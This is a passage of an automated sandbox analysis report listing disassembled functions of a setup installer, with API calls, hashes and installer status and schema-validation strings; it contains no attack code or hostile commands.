                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C9754E3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 0aac60b44314f77a0179812e11c568e948e9399ccfe580c0f11bf591f4a4b16d
                                                              • Instruction ID: 9b6c3db5af2371e171abb8fd071fa2278a00c0d95fdb0dac8413a018349680e1
                                                              • Opcode Fuzzy Hash: 0aac60b44314f77a0179812e11c568e948e9399ccfe580c0f11bf591f4a4b16d
                                                              • Instruction Fuzzy Hash: A5C09B76140108B7CB111A81DC05F45BF69DB95755F14C061F61805452C773D421D6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91C53D Relevance: 1.3, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,6C94A320,512AC3CC,?,?), ref: 6C91C55E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 27236241d8cd2a6dd92daba320b6ae792e38b0a22e2c8b84cbed3010c8bb5334
                                                              • Instruction ID: 5cae53a725b661e5d42035b6ba37abf57a4fe5b683f118f572a78bcd12fe6304
                                                              • Opcode Fuzzy Hash: 27236241d8cd2a6dd92daba320b6ae792e38b0a22e2c8b84cbed3010c8bb5334
                                                              • Instruction Fuzzy Hash: 7C118272649305AFE724DF25D917B2A7BF8AB00754F10853EE216DAAD0EB74E5048B48
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 6C944DC9 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94dc90e7c9f986c5ceebce08b163167fc9e1047054cc9e2ec35825078d9e7b0e
                                                              • Instruction ID: 584e1f11e41e5f3f20f55318502105cd8147268a7f5661c49f240edfe65e3d36
                                                              • Opcode Fuzzy Hash: 94dc90e7c9f986c5ceebce08b163167fc9e1047054cc9e2ec35825078d9e7b0e
                                                              • Instruction Fuzzy Hash: 7CA002723486CCD7466055866409E3277BEE1C26E6A5501B1D524425059973E811D9DA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C944E0D Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a38e8d0d7fe26c383cb0aced90c9e354cd9603280526a4e3aeea0fe3603578c4
                                                              • Instruction ID: 371102265c50c9f4cd519e8d9c5f8dd97d8d59e77774937e4d1815b575c174f3
                                                              • Opcode Fuzzy Hash: a38e8d0d7fe26c383cb0aced90c9e354cd9603280526a4e3aeea0fe3603578c4
                                                              • Instruction Fuzzy Hash: 72A0223220830CC3032000C32008C3233ACC0C2AA2A0000F0C0200380008B2E800C2C0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91DF27 Relevance: .0, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeac856f99a00f3fd365e77432530a281855428fda8c60d2eddf105f7c6056db
                                                              • Instruction ID: cce2bed3779da094b0d22d5d3c48ef3a3f3d2c5bbc6c63c18d6f323ac31e2061
                                                              • Opcode Fuzzy Hash: aeac856f99a00f3fd365e77432530a281855428fda8c60d2eddf105f7c6056db
                                                              • Instruction Fuzzy Hash: 61A0223220828CC3023000822008C32B3ACC0C22A2A0000B0C220020000A32E800E0E2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C939C23 Relevance: 26.7, APIs: 3, Strings: 12, Instructions: 486COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91391D: __EH_prolog3.LIBCMT ref: 6C913924
                                                              • __CxxThrowException@8.LIBCMT ref: 6C93A26F
                                                                • Part of subcall function 6C915349: __EH_prolog3.LIBCMT ref: 6C915350
                                                                • Part of subcall function 6C915349: OutputDebugStringW.KERNEL32(?,?,?,00000008,6C9463AF,000013EC,?,00000000,?,?,ReportingFlags,?,-0000000D,?,?,6C8F4A4C), ref: 6C915371
                                                              • SysFreeString.OLEAUT32(?), ref: 6C93A065
                                                              Strings
                                                              • Exe %s has initiated a restart., xrefs: 6C93A08C
                                                              • Exe %s returned success, but changes will not be effective until the service is restarted., xrefs: 6C93A076
                                                              • Performing Action on Exe at , xrefs: 6C939CE1
                                                              • Exe (%s) succeeded., xrefs: 6C93A0A6
                                                              • Exe (%s) failed with 0x%x - %s., xrefs: 6C93A03D
                                                              • Exe log file(s) :, xrefs: 6C939F57
                                                              • PerformOperation on exe returned exit code %u (translates to HRESULT = 0x%x), xrefs: 6C93A1B7
                                                              • complete, xrefs: 6C939C5F
                                                              • Exe (%s) succeeded and requires reboot., xrefs: 6C93A081
                                                              • Action, xrefs: 6C939D07
                                                              • Exe (%s) succeeded (but does not apply to any products on this machine), xrefs: 6C93A09B
                                                              • %s - Exe installer does not provide a log file name, xrefs: 6C939EED
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$DebugException@8FreeOutputThrow_memcpy_s
                                                              • String ID: complete$%s - Exe installer does not provide a log file name$Action$Exe %s has initiated a restart.$Exe %s returned success, but changes will not be effective until the service is restarted.$Exe (%s) failed with 0x%x - %s.$Exe (%s) succeeded (but does not apply to any products on this machine)$Exe (%s) succeeded and requires reboot.$Exe (%s) succeeded.$Exe log file(s) :$PerformOperation on exe returned exit code %u (translates to HRESULT = 0x%x)$Performing Action on Exe at
                                                              • API String ID: 4069489755-2724633158
                                                              • Opcode ID: f054520ca215f94f74e78d4e5e2f9fc985aecd5cfc3b0ebbcf9415d8d4cef4e7
                                                              • Instruction ID: 4ab238e6f6503463782b6e56378840687d2cf54afb8b5bc39a6f49694ebdc567
                                                              • Opcode Fuzzy Hash: f054520ca215f94f74e78d4e5e2f9fc985aecd5cfc3b0ebbcf9415d8d4cef4e7
                                                              • Instruction Fuzzy Hash: 401249711083419FD721CF68C884B5ABBE5BFAA318F044A1DF199D7B91CB35E909CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C927E17 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 445COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C927E1E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C927FA8
                                                              • __EH_prolog3.LIBCMT ref: 6C927FBA
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9280A9
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                                • Part of subcall function 6C94878F: __EH_prolog3.LIBCMT ref: 6C948796
                                                                • Part of subcall function 6C94878F: _wcsspn.LIBCMT ref: 6C9487D2
                                                                • Part of subcall function 6C94878F: _wcscspn.LIBCMT ref: 6C9487E8
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • a valid UninstallCommandLine is required., xrefs: 6C92804B
                                                              • has invalid LogFileHint, xrefs: 6C928182
                                                              • schema validation failure: , xrefs: 6C92816D
                                                              • schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like , xrefs: 6C928256
                                                              • must be empty., xrefs: 6C92826B
                                                              • [%s] - schema validation failure. Environment variable cannot be expanded! Name sould contain minimum of a valid environmental var, xrefs: 6C927F32
                                                              • ParameterInfo.xml, xrefs: 6C927F63, 6C928026, 6C92815D, 6C928246, 6C92835E
                                                              • [%s] - schema validation failure. Name sould contain minimum of a valid environmental variable pointing to an installed program to, xrefs: 6C927F55
                                                              • schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like , xrefs: 6C92836E
                                                              • ", xrefs: 6C9283BD
                                                              • When Rollback is true for item , xrefs: 6C928036
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$_wcscspn_wcsspn
                                                              • String ID: a valid UninstallCommandLine is required.$ has invalid LogFileHint$ must be empty.$"$ParameterInfo.xml$When Rollback is true for item $[%s] - schema validation failure. Environment variable cannot be expanded! Name sould contain minimum of a valid environmental var$[%s] - schema validation failure. Name sould contain minimum of a valid environmental variable pointing to an installed program to$schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like $schema validation failure: $schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like
                                                              • API String ID: 200342494-2088432839
                                                              • Opcode ID: 81de2b8afdbce1bfb2b2597ad0776f7c6171874a76c5c011675358e803863020
                                                              • Instruction ID: 40f0e1d27233e6112707469782715df3d974bb77c6ca4b7bc410c2db30e07f7a
                                                              • Opcode Fuzzy Hash: 81de2b8afdbce1bfb2b2597ad0776f7c6171874a76c5c011675358e803863020
                                                              • Instruction Fuzzy Hash: 4C02B032900248DFDB14DBF8C944BDDB7B8AF25328F148256E060B7B81D734DA49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C965C36 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965C3D
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965C90
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CB7
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CC4
                                                              • GlobalFree.KERNEL32(?), ref: 6C965CD1
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D20
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D2D
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D3A
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D5D
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D6A
                                                              • GlobalFree.KERNEL32(?), ref: 6C965D77
                                                              Strings
                                                              • WinHttpGetIEProxyConfigForCurrentUser, xrefs: 6C965C99
                                                              • Retrieving proxy information using WinHttpGetIEProxyConfigForCurrentUser, xrefs: 6C965C49
                                                              • Unable to retrieve Proxy information although WinHttpGetIEProxyConfigForCurrentUser called succeeded, xrefs: 6C965D45
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal$H_prolog3$ErrorLast
                                                              • String ID: Retrieving proxy information using WinHttpGetIEProxyConfigForCurrentUser$Unable to retrieve Proxy information although WinHttpGetIEProxyConfigForCurrentUser called succeeded$WinHttpGetIEProxyConfigForCurrentUser
                                                              • API String ID: 3758970598-3016001025
                                                              • Opcode ID: 351354564255dea16ec7c66caef12f08481beb3aad3a747039450f0d4b6dc028
                                                              • Instruction ID: 755fbdcbb36d6543a1a4a22abc7199df7e920f6238fbda81cf2eb8b93926026b
                                                              • Opcode Fuzzy Hash: 351354564255dea16ec7c66caef12f08481beb3aad3a747039450f0d4b6dc028
                                                              • Instruction Fuzzy Hash: DA410271D02628DFDF029FA6C9449DCFBB5BF58B18F24402AE410B6AA5C735D940CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92BD2C Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92BD33
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92C09E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: ($ApplicableIf$IsPresent$MSP$ParameterInfo.xml$PatchCode$RepairOverride$UninstallOverride$schema validation failure: MSP does not support RepairOverride or UninstallOverride child elements!$schema validation failure: Patch Code cannot be empty!$schema validation failure: wrong number of MSP child nodes!
                                                              • API String ID: 3670251406-3439019449
                                                              • Opcode ID: ba41765bb72bf0f823ad4b23694f3ae13fca7e5821f4794e746ce3b4086f3aab
                                                              • Instruction ID: 1fdabe322c8aa70889418273a53b5848d472b8c8afe7a2599b66a3bfa56e9cff
                                                              • Opcode Fuzzy Hash: ba41765bb72bf0f823ad4b23694f3ae13fca7e5821f4794e746ce3b4086f3aab
                                                              • Instruction Fuzzy Hash: DC027071A00249EFDB04DFA8C945ADEBBB9BF25308F148559F424DBB80C734DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C916D99 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C916DA0
                                                                • Part of subcall function 6C915F12: __EH_prolog3.LIBCMT ref: 6C915F19
                                                                • Part of subcall function 6C915F12: PathIsDirectoryW.SHLWAPI(?), ref: 6C915F56
                                                              Strings
                                                              • %s (%s) succeeded on product (%s). Msi Log: <a href="%s">%s</a>, xrefs: 6C9170A9
                                                              • : no error, xrefs: 6C9170DD
                                                              • %s (%s) succeeded on product (%s) and requires reboot. Msi Log: <a href="%s">%s</a>, xrefs: 6C916F53
                                                              • : ERROR_SUCCESS_RESTART_REQUIRED, xrefs: 6C916EF7
                                                              • %s (%s) succeeded on product (%s) and requires the service to be restarted. Msi Log: <a href="%s">%s</a>, xrefs: 6C916EC3
                                                              • : ERROR_SUCCESS_REBOOT_INITIATED, xrefs: 6C917025
                                                              • Return value - 0x%X, xrefs: 6C916DD6
                                                              • : ERROR_SUCCESS_REBOOT_REQUIRED, xrefs: 6C916F87
                                                              • : ERROR_UNKNOWN_PRODUCT (not actually an error - patch does not apply to this product), xrefs: 6C91704D
                                                              • %s (%s) succeeded on product (%s) and a reboot has been initiated!!!!. Msi Log: <a href="%s">%s</a>, xrefs: 6C916FF1
                                                              • %s (%s) failed on product (%s). Msi Log: <a href="%s">%s</a>, xrefs: 6C916E4A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DirectoryPath
                                                              • String ID: %s (%s) failed on product (%s). Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and a reboot has been initiated!!!!. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and requires reboot. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s) and requires the service to be restarted. Msi Log: <a href="%s">%s</a>$%s (%s) succeeded on product (%s). Msi Log: <a href="%s">%s</a>$: ERROR_SUCCESS_REBOOT_INITIATED$: ERROR_SUCCESS_REBOOT_REQUIRED$: ERROR_SUCCESS_RESTART_REQUIRED$: no error$: ERROR_UNKNOWN_PRODUCT (not actually an error - patch does not apply to this product)$Return value - 0x%X
                                                              • API String ID: 529697523-3126805711
                                                              • Opcode ID: e8f83060fb42c9ad5febde78104c832bf62037584ccfc6e34cb949dbc7f691a8
                                                              • Instruction ID: 9b6aca7310834ffdfc0f0b71b47b2e5573f909f579347058ab7501e3a6721a1f
                                                              • Opcode Fuzzy Hash: e8f83060fb42c9ad5febde78104c832bf62037584ccfc6e34cb949dbc7f691a8
                                                              • Instruction Fuzzy Hash: 34C19E71900209EFCF01CFA8C940ADDBBB2BF69318F148545F511ABBA1C731EA65DB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C927FB3 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 319COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • a valid UninstallCommandLine is required., xrefs: 6C92804B
                                                              • has invalid LogFileHint, xrefs: 6C928182
                                                              • schema validation failure: , xrefs: 6C92816D
                                                              • schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like , xrefs: 6C928256
                                                              • must be empty., xrefs: 6C92826B
                                                              • ParameterInfo.xml, xrefs: 6C927F63, 6C928026, 6C92815D, 6C928246, 6C92835E
                                                              • schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like , xrefs: 6C92836E
                                                              • ", xrefs: 6C9283BD
                                                              • When Rollback is true for item , xrefs: 6C928036
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: a valid UninstallCommandLine is required.$ has invalid LogFileHint$ must be empty.$"$ParameterInfo.xml$When Rollback is true for item $schema validation failure. URL, HashValue and DownLoadSize attributes are not valid for LocalExe type like $schema validation failure: $schema validation failure: The InstallCommandLine, UninstallCommandLind and RepairCommandLine of an ExeBase of MsuPackage like
                                                              • API String ID: 3670251406-573577147
                                                              • Opcode ID: f0c1c9debb50fb1e462fa9719abc3a2a765183853117145d2e139069b3ea5b8d
                                                              • Instruction ID: bb9493dbeb169fa03a77f9e5d98fefd205e55a52cc22373dffa691ae42732d26
                                                              • Opcode Fuzzy Hash: f0c1c9debb50fb1e462fa9719abc3a2a765183853117145d2e139069b3ea5b8d
                                                              • Instruction Fuzzy Hash: DED1C132901248DFDB14CBF8C944BDDB7B8AF25328F148256E060B7B81D734EA49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C946DCB Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 351COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BEBC
                                                                • Part of subcall function 6C94BE94: _free.LIBCMT ref: 6C94BECD
                                                              • GetCommandLineW.KERNEL32(512AC3CC,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C946E16
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C948FC3: _calloc.LIBCMT ref: 6C948FE1
                                                                • Part of subcall function 6C94EBE9: __recalloc.LIBCMT ref: 6C94EBFA
                                                              Strings
                                                              • " switch cannot be disabled, but is specified in the DisabledCommandLineSwitches., xrefs: 6C94728A
                                                              • " switch is disallowed for this package., xrefs: 6C947064
                                                              • " switch has been disallowed for this package., xrefs: 6C947004
                                                              • The ", xrefs: 6C947051, 6C947277
                                                              • quiet, xrefs: 6C946F35
                                                              • Command-line option error: the ", xrefs: 6C946FF1
                                                              • Command-line option error: unrecognized switch(es) ", xrefs: 6C94716B
                                                              • Setup, xrefs: 6C946E7D
                                                              • Unrecognized switch(es) ", xrefs: 6C9471CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: _free$CommandH_prolog3Line__recalloc_calloc
                                                              • String ID: " switch cannot be disabled, but is specified in the DisabledCommandLineSwitches.$" switch has been disallowed for this package.$" switch is disallowed for this package.$Command-line option error: the "$Command-line option error: unrecognized switch(es) "$Setup$The "$Unrecognized switch(es) "$quiet
                                                              • API String ID: 1533339410-3701387627
                                                              • Opcode ID: 93d4a4252b620e5171147be8cd95cbb3be53704c4253e22a8646d16679a8241b
                                                              • Instruction ID: 95984db385e565e824dab4e0382175ac648f62d8d65eb63c8cf31346fbf51081
